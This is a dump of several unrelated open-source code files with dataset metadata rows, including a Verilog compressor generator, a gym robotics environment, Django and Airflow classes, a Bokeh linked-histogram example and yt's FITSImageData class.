template_data = self._GenerateFromTemplate(
'header_setuptools', template_mappings)
file_content.append(template_data)
if self._project_definition.name in self._PROJECTS_WITH_SDIST_TEST_DATA:
template_data = self._GenerateFromTemplate(
'import_sdist', template_mappings)
file_content.append(template_data)
for template_file in ('import_module', 'bdist_msi', 'bdist_rpm-start'):
template_data = self._GenerateFromTemplate(
template_file, template_mappings)
file_content.append(template_data)
if data_directory and scripts_directory:
template_file = 'bdist_rpm-with_data_and_tools'
elif data_directory:
template_file = 'bdist_rpm-with_data'
else:
template_file = 'bdist_rpm'
template_data = self._GenerateFromTemplate(template_file, template_mappings)
file_content.append(template_data)
template_data = self._GenerateFromTemplate(
'setup_header', template_mappings)
file_content.append(template_data)
if self._project_definition.name in self._PROJECTS_WITH_SDIST_TEST_DATA:
template_file = 'setup_cmdclass_sdist'
else:
template_file = 'setup_cmdclass'
template_data = self._GenerateFromTemplate(template_file, template_mappings)
file_content.append(template_data)
template_data = self._GenerateFromTemplate(
'setup_classifiers', template_mappings)
file_content.append(template_data)
if self._project_definition.name in self._PROJECTS_WITH_PACKAGE_DATA:
template_data = self._GenerateFromTemplate(
'setup_package_data', template_mappings)
file_content.append(template_data)
if scripts_directory:
template_data = self._GenerateFromTemplate(
'setup_scripts', template_mappings)
file_content.append(template_data)
template_data = self._GenerateFromTemplate(
'setup_data_files', template_mappings)
file_content.append(template_data)
if data_directory:
if self._project_definition.name == 'plaso':
template_file = 'setup_data_files-with_data-plaso'
else:
template_file = 'setup_data_files-with_data'
template_data = self._GenerateFromTemplate(
template_file, template_mappings)
file_content.append(template_data)
template_data = self._GenerateFromTemplate(
'setup_footer', template_mappings)
file_content.append(template_data)
file_content = ''.join(file_content)
with io.open(self.PATH, 'w', encoding='utf-8') as file_object:
file_object.write(file_content)
| 34.910714 | 80 | 0.690829 |
0f47cad4e6dba73f381706d7a2d2c8aa833f96b5 | 4,917 | py | Python | third_party/tests/BlackParrot/external/basejump_stl/hard/tsmc_40/bsg_misc/bsg_mul/bsg_comp42_gen.py | bsp13/Surelog | 3a04f7f59791390c69f1e3b69609db4ede7668b9 | [
"Apache-2.0"
] | 3 | 2021-05-12T21:57:55.000Z | 2021-07-29T19:56:04.000Z | third_party/tests/BlackParrot/external/basejump_stl/hard/tsmc_40/bsg_misc/bsg_mul/bsg_comp42_gen.py | bsp13/Surelog | 3a04f7f59791390c69f1e3b69609db4ede7668b9 | [
"Apache-2.0"
] | 2 | 2020-05-13T06:06:49.000Z | 2020-05-15T10:49:11.000Z | third_party/tests/BlackParrot/external/basejump_stl/hard/tsmc_40/bsg_misc/bsg_mul/bsg_comp42_gen.py | bsp13/Surelog | 3a04f7f59791390c69f1e3b69609db4ede7668b9 | [
"Apache-2.0"
] | 2 | 2020-05-01T08:33:19.000Z | 2021-07-29T19:56:12.000Z | #!/usr/bin/python
#
# bsg_comp42_gen < number of rows of 4:2 compressors >
#
#
#
# This script generates sections of 42: compressors for
# multipliers. (See Computer Arthmetic Google Doc.)
#
#
#
#
import sys;
def emit_module_header (name, input_args, output_args) :
print "module " + name + " (",
my_list = []
for x in input_args :
my_list.append("input "+x+"\n");
for x in output_args :
my_list.append("output "+x+"\n");
print (" "*(len(name)+8)+",").join(my_list);
print ");";
def emit_module_footer( ) :
print "endmodule";
def emit_wire_definition (name) :
print "wire " + name + "; "
def emit_wire_definition_nocr (name) :
print "wire " + name + "; ",
def emit_gate_instance (gate_str, arg_list ) :
print gate_instance(gate_str,arg_list);
def queue_gate_instance (out_dict, gate_str, arg_list, order) :
the_string = gate_instance(gate_str,arg_list)
out_dict[the_string] = order
def gate_instance (gate_str, arg_list ) :
for i in range(0,len(arg_list)) :
gate_str = gate_str.replace("#"+str(i),arg_list[i]);
return gate_str;
def access_bit (name, bit) :
return name + "[" + str(bit) + "]";
def access_2D_bit (name, word,bit,rows) :
if (name == "i") :
return name + "[" + str(word * rows + bit) + "]" + "/*" + name + "[" + str(word) + "][" + str(bit) + "]" + "*/";
else :
return "error";
def access_3D_bit (name, dof, word,bit) :
if (name == "y_vec_i") :
maxword = 4;
maxbit = 2;
return name + "[" + str(maxbit*(dof*maxword+word)+bit)+ "] /*" + name + "[" + str(dof) + "][" + str(word) + "][" + str(bit) + "]" + "*/";
else :
return "error";
def param_bits_all (name, bit) :
return "[" + str(bit-1) + ":0] " + name;
def param_bits_2D_all (name, words,bit) :
return "["+str(words-1) + ":0][" + str(bit-1) + ":0] " + name;
def param_bits_3D_all (name, words,bit,zop) :
return "["+str(words-1) + ":0][" + str(bit-1) + ":0]["+str(zop-1)+":0] " + name;
def ident_name_word_bit (name,word,bit) :
return name + "_w" + str(word) + "_b" + str(bit);
def ident_name_bit_port (name,bit,port) :
return name + "_b" + str(bit) + "_p" + str(port);
def ident_name_word_bit_port (name,word,bit,port) :
return name + "_w" + str(word) + "_b" + str(bit) + "_p" + str(port);
def ident_name_bit (name,bit) :
return name + "_b" + str(bit);
def emit_rp_group_begin (name) :
print "// synopsys rp_group (" + name + ")"
def emit_rp_group_end (name) :
print "// synopsys rp_endgroup (" + name +")"
def emit_rp_fill (params):
print "// synopsys rp_fill (" + params +")"
# NOTE: for symmetric pins, assume that earlier ones are always faster.
# For example, for AOI22 A's are faster than B's and A0 is faster than A1.
#
fab = "tsmc_40"
aoi22 = "AOI22X1 #0 (.A0(#1), .A1(#2), .B0(#3), .B1(#4), .Y(#5) );"
xnor2 = "XNOR2X1 #0 (.A (#1), .B (#2), .Y (#3) );"
addf = "ADDFHX1 #0 (.A (#1), .B (#2), .CI (#3), .S(#4), .CO(#5) );"
#
# CSA
# CSA
#
def generate_c42_block ( rows ) :
module_name = ident_name_bit("bsg_rp_"+fab+"_comp42_block",rows);
emit_module_header (module_name
, [ param_bits_all("i",4*rows) + " /*" + param_bits_2D_all("i",4,rows)+ "*/"
, "cr_i"
]
, [ "cl_o", param_bits_all("c_o",rows), param_bits_all("s_o",rows)]
);
column = 0
emit_rp_group_begin("c42")
for pos in range (0,rows) :
print ""
print "wire " + ident_name_bit("s_int",pos) +";";
print "wire " + ident_name_bit("cl_int",pos)+";";
emit_rp_fill("0 " + str(pos*2) + " UX");
emit_gate_instance(addf
, [ ident_name_word_bit("add42", pos, 0)
, access_2D_bit("i", 3, pos, rows)
, access_2D_bit("i", 2, pos, rows)
, access_2D_bit("i", 1, pos, rows)
, ident_name_bit("s_int", pos)
, "cl_o" if (pos == rows-1) else ident_name_bit("cl_int",pos)
]);
# insert ADDF here
emit_gate_instance(addf
, [ ident_name_word_bit("add42", pos, 1)
, access_2D_bit("i", 0, pos, rows)
, ident_name_bit("s_int", pos)
, ident_name_bit("cl_int" ,pos-1) if (pos > 0) else "cr_i"
, access_bit("s_o", pos)
, access_bit("c_o", pos)
]);
emit_rp_group_end("c42")
emit_module_footer()
if len(sys.argv) == 2 :
generate_c42_block (int(sys.argv[1]));
else :
print "Usage: " + sys.argv[0] + " rows";
| 30.351852 | 145 | 0.517999 |
0cd3c76b3b0d8abe62060fc7e39556b16496afe6 | 304 | py | Python | 2017/04/bidi-bidi-refugee-camp-overview-20170313/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 14 | 2015-05-08T13:41:51.000Z | 2021-02-24T12:34:55.000Z | 2017/04/bidi-bidi-refugee-camp-overview-20170313/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | null | null | null | 2017/04/bidi-bidi-refugee-camp-overview-20170313/graphic_config.py | nprapps/graphics-archive | 97b0ef326b46a959df930f5522d325e537f7a655 | [
"FSFAP"
] | 7 | 2015-04-04T04:45:54.000Z | 2021-02-18T11:12:48.000Z | #!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1njqSO2c0DSdSy6FRZN0iRGTUX424B-u2DkyRt-93RM8'
USE_ASSETS = True
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| 21.714286 | 77 | 0.8125 |
2a0b0ae144728342a6eb718da94bef2e3f94e519 | 872 | py | Python | gym/envs/robotics/fetch/pick_and_place.py | LBJ-Wade/gym | c0286e25265582ae9b4ef89942780588ae0f0394 | [
"Python-2.0",
"OLDAP-2.7"
] | 32 | 2018-08-26T15:39:07.000Z | 2021-12-09T03:53:49.000Z | gym/envs/robotics/fetch/pick_and_place.py | LBJ-Wade/gym | c0286e25265582ae9b4ef89942780588ae0f0394 | [
"Python-2.0",
"OLDAP-2.7"
] | 1 | 2020-09-08T02:19:05.000Z | 2020-11-02T03:43:29.000Z | gym/envs/robotics/fetch/pick_and_place.py | LBJ-Wade/gym | c0286e25265582ae9b4ef89942780588ae0f0394 | [
"Python-2.0",
"OLDAP-2.7"
] | 8 | 2018-11-19T19:51:43.000Z | 2021-12-07T20:08:52.000Z | from gym import utils
from gym.envs.robotics import fetch_env
class FetchPickAndPlaceEnv(fetch_env.FetchEnv, utils.EzPickle):
def __init__(self, reward_type='sparse'):
initial_qpos = {
'robot0:slide0': 0.405,
'robot0:slide1': 0.48,
'robot0:slide2': 0.0,
'table0:slide0': 1.05,
'table0:slide1': 0.4,
'table0:slide2': 0.0,
'object0:joint': [1.25, 0.53, 0.4, 1., 0., 0., 0.],
}
fetch_env.FetchEnv.__init__(
self, 'fetch/pick_and_place.xml', has_object=True, block_gripper=False, n_substeps=20,
gripper_extra_height=0.2, target_in_the_air=True, target_offset=0.0,
obj_range=0.15, target_range=0.15, distance_threshold=0.05,
initial_qpos=initial_qpos, reward_type=reward_type)
utils.EzPickle.__init__(self)
| 39.636364 | 98 | 0.613532 |
ef6549c6ea2d3717f09974c9175cfd35fc120fb0 | 347 | py | Python | dnsmanager/views.py | erdnaxe/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 8 | 2019-12-21T10:07:49.000Z | 2021-08-27T23:51:54.000Z | dnsmanager/views.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 6 | 2019-12-21T09:45:14.000Z | 2021-03-27T10:14:28.000Z | dnsmanager/views.py | constellation-project/django-dnsmanager | 5c00c8f6ca98678d5e8f02243622419f602d4daa | [
"BSD-3-Clause"
] | 3 | 2020-07-19T23:15:53.000Z | 2021-03-26T19:00:20.000Z | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.views.generic.detail import DetailView
from .models import Zone
class ZoneDetailView(PermissionRequiredMixin, DetailView):
"""
This view generates a zone file
"""
permission_required = ('dnsmanager.view_zone', 'dnsmanager.view_record')
model = Zone
| 26.692308 | 76 | 0.766571 |
6b6c82c1482afa96b54acfa35e5431bf0ff37b5c | 2,696 | py | Python | airflow/operators/latest_only_operator.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 8 | 2017-04-20T16:15:44.000Z | 2020-10-11T13:44:10.000Z | airflow/operators/latest_only_operator.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 219 | 2017-03-15T18:40:16.000Z | 2022-02-28T22:52:43.000Z | airflow/operators/latest_only_operator.py | IGIT-CN/airflow | a6e5bcd59198afe5716813e84ebc4c59eade532c | [
"Apache-2.0"
] | 3 | 2016-07-14T21:51:10.000Z | 2020-10-12T13:26:36.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains an operator to run downstream tasks only for the
latest scheduled DagRun
"""
from typing import Dict, Iterable, Union
import pendulum
from airflow.operators.branch_operator import BaseBranchOperator
class LatestOnlyOperator(BaseBranchOperator):
"""
Allows a workflow to skip tasks that are not running during the most
recent schedule interval.
If the task is run outside of the latest schedule interval (i.e. external_trigger),
all directly downstream tasks will be skipped.
Note that downstream tasks are never skipped if the given DAG_Run is
marked as externally triggered.
"""
ui_color = '#e9ffdb' # nyanza
def choose_branch(self, context: Dict) -> Union[str, Iterable[str]]:
# If the DAG Run is externally triggered, then return without
# skipping downstream tasks
if context['dag_run'] and context['dag_run'].external_trigger:
self.log.info(
"Externally triggered DAG_Run: allowing execution to proceed.")
return context['task'].get_direct_relative_ids(upstream=False)
now = pendulum.utcnow()
left_window = context['dag'].following_schedule(
context['execution_date'])
right_window = context['dag'].following_schedule(left_window)
self.log.info(
'Checking latest only with left_window: %s right_window: %s now: %s',
left_window, right_window, now
)
if not left_window < now <= right_window:
self.log.info('Not latest execution, skipping downstream.')
# we return an empty list, thus the parent BaseBranchOperator
# won't exclude any downstream tasks from skipping.
return []
else:
self.log.info('Latest, allowing execution to proceed.')
return context['task'].get_direct_relative_ids(upstream=False)
| 39.647059 | 87 | 0.704006 |
2cfe8f5665efc1c5f023cbb1f5554354a7fee5a7 | 332 | py | Python | pajson/example.py | DreeGall/pajson | ff35962feee98f37ada6f10348012945c665297b | [
"MIT"
] | null | null | null | pajson/example.py | DreeGall/pajson | ff35962feee98f37ada6f10348012945c665297b | [
"MIT"
] | null | null | null | pajson/example.py | DreeGall/pajson | ff35962feee98f37ada6f10348012945c665297b | [
"MIT"
] | null | null | null | """Example of code."""
def hello(name: str) -> str:
"""Just an greetings example.
Args:
name (str): Name to greet.
Returns:
str: greeting message
Examples:
.. code:: python
>>> hello("Roman")
'Hello Roman!'
"""
return f"Hello {name}!"
| 16.6 | 35 | 0.463855 |
54717be602c0abc4af7a989878b806cc212e6f1f | 3,725 | py | Python | bokehdash/BokehApps/selection_histogram.py | longtailfinancial/BokehDjango | 6e4a014f7e54edcb129ca38b28692bd2e374bdfd | [
"MIT"
] | 49 | 2017-11-08T18:54:19.000Z | 2021-11-16T12:34:16.000Z | bokehdash/BokehApps/selection_histogram.py | longtailfinancial/BokehDjango | 6e4a014f7e54edcb129ca38b28692bd2e374bdfd | [
"MIT"
] | null | null | null | bokehdash/BokehApps/selection_histogram.py | longtailfinancial/BokehDjango | 6e4a014f7e54edcb129ca38b28692bd2e374bdfd | [
"MIT"
] | 16 | 2017-11-14T12:53:51.000Z | 2021-08-07T22:48:16.000Z | ''' Present a scatter plot with linked histograms on both axes.
Use the ``bokeh serve`` command to run the example by executing:
bokeh serve selection_histogram.py
at your command prompt. Then navigate to the URL
http://localhost:5006/selection_histogram
in your browser.
'''
import numpy as np
from bokeh.layouts import row, column
from bokeh.models import BoxSelectTool, LassoSelectTool, Spacer
from bokeh.plotting import figure, curdoc
# create three normal population samples with different parameters
x1 = np.random.normal(loc=5.0, size=400) * 100
y1 = np.random.normal(loc=10.0, size=400) * 10
x2 = np.random.normal(loc=5.0, size=800) * 50
y2 = np.random.normal(loc=5.0, size=800) * 10
x3 = np.random.normal(loc=55.0, size=200) * 10
y3 = np.random.normal(loc=4.0, size=200) * 10
x = np.concatenate((x1, x2, x3))
y = np.concatenate((y1, y2, y3))
TOOLS="pan,wheel_zoom,box_select,lasso_select,reset"
# create the scatter plot
p = figure(tools=TOOLS, plot_width=600, plot_height=600, min_border=10, min_border_left=50,
toolbar_location="above", x_axis_location=None, y_axis_location=None,
title="Linked Histograms")
p.background_fill_color = "#fafafa"
p.select(BoxSelectTool).select_every_mousemove = False
p.select(LassoSelectTool).select_every_mousemove = False
r = p.scatter(x, y, size=3, color="#3A5785", alpha=0.6)
# create the horizontal histogram
hhist, hedges = np.histogram(x, bins=20)
hzeros = np.zeros(len(hedges)-1)
hmax = max(hhist)*1.1
LINE_ARGS = dict(color="#3A5785", line_color=None)
ph = figure(toolbar_location=None, plot_width=p.plot_width, plot_height=200, x_range=p.x_range,
y_range=(-hmax, hmax), min_border=10, min_border_left=50, y_axis_location="right")
ph.xgrid.grid_line_color = None
ph.yaxis.major_label_orientation = np.pi/4
ph.background_fill_color = "#fafafa"
ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color="white", line_color="#3A5785")
hh1 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.5, **LINE_ARGS)
hh2 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.1, **LINE_ARGS)
# create the vertical histogram
vhist, vedges = np.histogram(y, bins=20)
vzeros = np.zeros(len(vedges)-1)
vmax = max(vhist)*1.1
pv = figure(toolbar_location=None, plot_width=200, plot_height=p.plot_height, x_range=(-vmax, vmax),
y_range=p.y_range, min_border=10, y_axis_location="right")
pv.ygrid.grid_line_color = None
pv.xaxis.major_label_orientation = np.pi/4
pv.background_fill_color = "#fafafa"
pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vhist, color="white", line_color="#3A5785")
vh1 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.5, **LINE_ARGS)
vh2 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.1, **LINE_ARGS)
layout = column(row(p, pv), row(ph, Spacer(width=200, height=200)))
curdoc().add_root(layout)
curdoc().title = "Selection Histogram"
def update(attr, old, new):
inds = np.array(new['1d']['indices'])
if len(inds) == 0 or len(inds) == len(x):
hhist1, hhist2 = hzeros, hzeros
vhist1, vhist2 = vzeros, vzeros
else:
neg_inds = np.ones_like(x, dtype=np.bool)
neg_inds[inds] = False
hhist1, _ = np.histogram(x[inds], bins=hedges)
vhist1, _ = np.histogram(y[inds], bins=vedges)
hhist2, _ = np.histogram(x[neg_inds], bins=hedges)
vhist2, _ = np.histogram(y[neg_inds], bins=vedges)
hh1.data_source.data["top"] = hhist1
hh2.data_source.data["top"] = -hhist2
vh1.data_source.data["right"] = vhist1
vh2.data_source.data["right"] = -vhist2
r.data_source.on_change('selected', update) | 39.210526 | 101 | 0.70443 |
c122a15f2ece0b2d3c7db2d611d74b2011b29bce | 583 | py | Python | django/amazon_price_tracker/core/permissions.py | PiochU19/amazon-price-tracker | 93a321d5799ee2b0b02487fea5577698a6da8aa3 | [
"MIT"
] | null | null | null | django/amazon_price_tracker/core/permissions.py | PiochU19/amazon-price-tracker | 93a321d5799ee2b0b02487fea5577698a6da8aa3 | [
"MIT"
] | 1 | 2021-06-10T22:05:12.000Z | 2021-06-10T22:05:12.000Z | django/amazon_price_tracker/core/permissions.py | PiochU19/amazon_price_tracker | 93a321d5799ee2b0b02487fea5577698a6da8aa3 | [
"MIT"
] | 1 | 2022-01-09T03:23:19.000Z | 2022-01-09T03:23:19.000Z | from rest_framework.permissions import BasePermission
class IsObjectOwner(BasePermission):
"""
Custom Permission Class
Checks if authenticated user
is owner of Object
"""
def has_permission(self, request, view):
"""
First we need to check
if user is authenticated
"""
return request.user and request.user.is_authenticated
def has_object_permission(self, request, view, obj):
"""
Then we need to check if
authenticated user is Object
"""
return obj.user == request.user
| 22.423077 | 61 | 0.634648 |
2ca350477bbb3305a4058c400a94b87b7445388d | 37,905 | py | Python | yt/visualization/fits_image.py | saethlin/yt | 992ae71974dca933346e91008c5a50f43a0a350e | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/visualization/fits_image.py | saethlin/yt | 992ae71974dca933346e91008c5a50f43a0a350e | [
"BSD-3-Clause-Clear"
] | 2 | 2020-02-10T22:55:35.000Z | 2020-02-19T21:01:20.000Z | yt/visualization/fits_image.py | saethlin/yt | 992ae71974dca933346e91008c5a50f43a0a350e | [
"BSD-3-Clause-Clear"
] | null | null | null | """
FITSImageData Class
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from yt.extern.six import string_types
import numpy as np
from yt.fields.derived_field import DerivedField
from yt.funcs import mylog, iterable, fix_axis, ensure_list, \
issue_deprecation_warning
from yt.visualization.fixed_resolution import FixedResolutionBuffer
from yt.data_objects.construction_data_containers import YTCoveringGrid
from yt.utilities.on_demand_imports import _astropy
from yt.units.yt_array import YTQuantity, YTArray
from yt.units import dimensions
from yt.utilities.parallel_tools.parallel_analysis_interface import \
parallel_root_only
from yt.visualization.volume_rendering.off_axis_projection import off_axis_projection
import re
import sys
class UnitfulHDU(object):
def __init__(self, hdu):
self.hdu = hdu
self.header = self.hdu.header
self.name = self.header["BTYPE"]
self.units = self.header["BUNIT"]
self.shape = self.hdu.shape
@property
def data(self):
return YTArray(self.hdu.data, self.units)
def __repr__(self):
im_shape = " x ".join([str(s) for s in self.shape])
return "FITSImage: %s (%s, %s)" % (self.name, im_shape, self.units)
class FITSImageData(object):
def __init__(self, data, fields=None, units=None, width=None, wcs=None):
r""" Initialize a FITSImageData object.
FITSImageData contains a collection of FITS ImageHDU instances and
WCS information, along with units for each of the images. FITSImageData
instances can be constructed from ImageArrays, NumPy arrays, dicts
of such arrays, FixedResolutionBuffers, and YTCoveringGrids. The latter
two are the most powerful because WCS information can be constructed
automatically from their coordinates.
Parameters
----------
data : FixedResolutionBuffer or a YTCoveringGrid. Or, an
ImageArray, an numpy.ndarray, or dict of such arrays
The data to be made into a FITS image or images.
fields : single string or list of strings, optional
The field names for the data. If *fields* is none and *data* has
keys, it will use these for the fields. If *data* is just a
single array one field name must be specified.
units : string
The units of the WCS coordinates. Defaults to "cm".
width : float or YTQuantity
The width of the image. Either a single value or iterable of values.
If a float, assumed to be in *units*. Only used if this information
is not already provided by *data*.
wcs : `astropy.wcs.WCS` instance, optional
Supply an AstroPy WCS instance. Will override automatic WCS
creation from FixedResolutionBuffers and YTCoveringGrids.
Examples
--------
>>> # This example uses a FRB.
>>> ds = load("sloshing_nomag2_hdf5_plt_cnt_0150")
>>> prj = ds.proj(2, "kT", weight_field="density")
>>> frb = prj.to_frb((0.5, "Mpc"), 800)
>>> # This example just uses the FRB and puts the coords in kpc.
>>> f_kpc = FITSImageData(frb, fields="kT", units="kpc")
>>> # This example specifies a specific WCS.
>>> from astropy.wcs import WCS
>>> w = WCS(naxis=self.dimensionality)
>>> w.wcs.crval = [30., 45.] # RA, Dec in degrees
>>> w.wcs.cunit = ["deg"]*2
>>> nx, ny = 800, 800
>>> w.wcs.crpix = [0.5*(nx+1), 0.5*(ny+1)]
>>> w.wcs.ctype = ["RA---TAN","DEC--TAN"]
>>> scale = 1./3600. # One arcsec per pixel
>>> w.wcs.cdelt = [-scale, scale]
>>> f_deg = FITSImageData(frb, fields="kT", wcs=w)
>>> f_deg.writeto("temp.fits")
"""
self.fields = []
self.field_units = {}
if units is None:
units = "cm"
if width is None:
width = 1.0
exclude_fields = ['x','y','z','px','py','pz',
'pdx','pdy','pdz','weight_field']
if isinstance(data, _astropy.pyfits.HDUList):
self.hdulist = data
for hdu in data:
self.fields.append(hdu.header["btype"])
self.field_units[hdu.header["btype"]] = hdu.header['bunit']
self.shape = self.hdulist[0].shape
self.dimensionality = len(self.shape)
wcs_names = [key for key in self.hdulist[0].header
if "WCSNAME" in key]
for name in wcs_names:
if name == "WCSNAME":
key = ' '
else:
key = name[-1]
w = _astropy.pywcs.WCS(header=self.hdulist[0].header,
key=key, naxis=self.dimensionality)
setattr(self, "wcs"+key.strip().lower(), w)
return
self.hdulist = _astropy.pyfits.HDUList()
if isinstance(fields, string_types):
fields = [fields]
if hasattr(data, 'keys'):
img_data = data
if fields is None:
fields = list(img_data.keys())
elif isinstance(data, np.ndarray):
if fields is None:
mylog.warning("No field name given for this array. "
"Calling it 'image_data'.")
fn = 'image_data'
fields = [fn]
else:
fn = fields[0]
img_data = {fn: data}
for fd in fields:
if isinstance(fd, tuple):
self.fields.append(fd[1])
elif isinstance(fd, DerivedField):
self.fields.append(fd.name[1])
else:
self.fields.append(fd)
first = True
for name, field in zip(self.fields, fields):
if name not in exclude_fields:
if hasattr(img_data[field], "units"):
self.field_units[name] = str(img_data[field].units)
else:
self.field_units[name] = "dimensionless"
mylog.info("Making a FITS image of field %s" % name)
if first:
hdu = _astropy.pyfits.PrimaryHDU(np.array(img_data[field]))
first = False
else:
hdu = _astropy.pyfits.ImageHDU(np.array(img_data[field]))
hdu.name = name
hdu.header["btype"] = name
hdu.header["bunit"] = re.sub('()', '', self.field_units[name])
self.hdulist.append(hdu)
self.shape = self.hdulist[0].shape
self.dimensionality = len(self.shape)
if wcs is None:
w = _astropy.pywcs.WCS(header=self.hdulist[0].header,
naxis=self.dimensionality)
if isinstance(img_data, FixedResolutionBuffer):
# FRBs are a special case where we have coordinate
# information, so we take advantage of this and
# construct the WCS object
dx = (img_data.bounds[1]-img_data.bounds[0]).to(units).v
dy = (img_data.bounds[3]-img_data.bounds[2]).to(units).v
dx /= self.shape[0]
dy /= self.shape[1]
xctr = 0.5*(img_data.bounds[1]+img_data.bounds[0]).to(units).v
yctr = 0.5*(img_data.bounds[3]+img_data.bounds[2]).to(units).v
center = [xctr, yctr]
cdelt = [dx, dy]
elif isinstance(img_data, YTCoveringGrid):
cdelt = img_data.dds.to(units).v
center = 0.5*(img_data.left_edge+img_data.right_edge).to(units).v
else:
# If img_data is just an array, we assume the center is the
# origin and use the image width to determine the cell widths
if not iterable(width):
width = [width]*self.dimensionality
if isinstance(width[0], YTQuantity):
cdelt = [wh.to(units).v/n for wh, n in zip(width, self.shape)]
else:
cdelt = [float(wh)/n for wh, n in zip(width, self.shape)]
center = [0.0]*self.dimensionality
w.wcs.crpix = 0.5*(np.array(self.shape)+1)
w.wcs.crval = center
w.wcs.cdelt = cdelt
w.wcs.ctype = ["linear"]*self.dimensionality
w.wcs.cunit = [units]*self.dimensionality
self.set_wcs(w)
else:
self.set_wcs(wcs)
def set_wcs(self, wcs, wcsname=None, suffix=None):
"""
Set the WCS coordinate information for all images
with a WCS object *wcs*.
"""
if wcsname is None:
wcs.wcs.name = 'yt'
else:
wcs.wcs.name = wcsname
h = wcs.to_header()
if suffix is None:
self.wcs = wcs
else:
setattr(self, "wcs"+suffix, wcs)
for img in self.hdulist:
for k, v in h.items():
kk = k
if suffix is not None:
kk += suffix
img.header[kk] = v
def update_header(self, field, key, value):
"""
Update the FITS header for *field* with a
*key*, *value* pair. If *field* == "all", all
headers will be updated.
"""
if field == "all":
for img in self.hdulist:
img.header[key] = value
else:
if field not in self.keys():
raise KeyError("%s not an image!" % field)
idx = self.fields.index(field)
self.hdulist[idx].header[key] = value
def update_all_headers(self, key, value):
mylog.warning("update_all_headers is deprecated. "
"Use update_header('all', key, value) instead.")
self.update_header("all", key, value)
def keys(self):
return self.fields
def has_key(self, key):
return key in self.fields
def values(self):
return [self[k] for k in self.fields]
def items(self):
return [(k, self[k]) for k in self.fields]
def __getitem__(self, item):
return UnitfulHDU(self.hdulist[item])
def __repr__(self):
return str([self[k] for k in self.keys()])
def info(self, output=None):
"""
Summarize the info of the HDUs in this `FITSImageData`
instance.
Note that this function prints its results to the console---it
does not return a value.
Parameters
----------
output : file, boolean, optional
A file-like object to write the output to. If `False`, does not
output to a file and instead returns a list of tuples representing
the FITSImageData info. Writes to ``sys.stdout`` by default.
"""
hinfo = self.hdulist.info(output=False)
num_cols = len(hinfo[0])
if output is None:
output = sys.stdout
if num_cols == 8:
header = 'No. Name Ver Type Cards Dimensions Format Units'
format = '{:3d} {:10} {:3} {:11} {:5d} {} {} {}'
else:
header = 'No. Name Type Cards Dimensions Format Units'
format = '{:3d} {:10} {:11} {:5d} {} {} {}'
if self.hdulist._file is None:
name = '(No file associated with this FITSImageData)'
else:
name = self.hdulist._file.name
results = ['Filename: {}'.format(name), header]
for line in hinfo:
units = self.field_units[self.hdulist[line[0]].header['btype']]
summary = tuple(list(line[:-1]) + [units])
if output:
results.append(format.format(*summary))
else:
results.append(summary)
if output:
output.write('\n'.join(results))
output.write('\n')
output.flush()
else:
return results[2:]
@parallel_root_only
def writeto(self, fileobj, fields=None, overwrite=False, **kwargs):
r"""
Write all of the fields or a subset of them to a FITS file.
Parameters
----------
fileobj : string
The name of the file to write to.
fields : list of strings, optional
The fields to write to the file. If not specified
all of the fields in the buffer will be written.
clobber : overwrite, optional
Whether or not to overwrite a previously existing file.
Default: False
Additional keyword arguments are passed to
:meth:`~astropy.io.fits.HDUList.writeto`.
"""
if "clobber" in kwargs:
issue_deprecation_warning("The \"clobber\" keyword argument "
"is deprecated. Use the \"overwrite\" "
"argument, which has the same effect, "
"instead.")
overwrite = kwargs.pop("clobber")
if fields is None:
hdus = self.hdulist
else:
hdus = _astropy.pyfits.HDUList()
for field in fields:
hdus.append(self.hdulist[field])
hdus.writeto(fileobj, overwrite=overwrite, **kwargs)
def to_glue(self, label="yt", data_collection=None):
"""
Takes the data in the FITSImageData instance and exports it to
Glue (http://glueviz.org) for interactive analysis. Optionally
add a *label*. If you are already within the Glue environment, you
can pass a *data_collection* object, otherwise Glue will be started.
"""
from glue.core import DataCollection, Data
from glue.core.coordinates import coordinates_from_header
try:
from glue.app.qt.application import GlueApplication
except ImportError:
from glue.qt.glue_application import GlueApplication
image = Data(label=label)
image.coords = coordinates_from_header(self.wcs.to_header())
for k in self.fields:
image.add_component(self[k].data, k)
if data_collection is None:
dc = DataCollection([image])
app = GlueApplication(dc)
app.start()
else:
data_collection.append(image)
def to_aplpy(self, **kwargs):
"""
Use APLpy (http://aplpy.github.io) for plotting. Returns an
`aplpy.FITSFigure` instance. All keyword arguments are passed
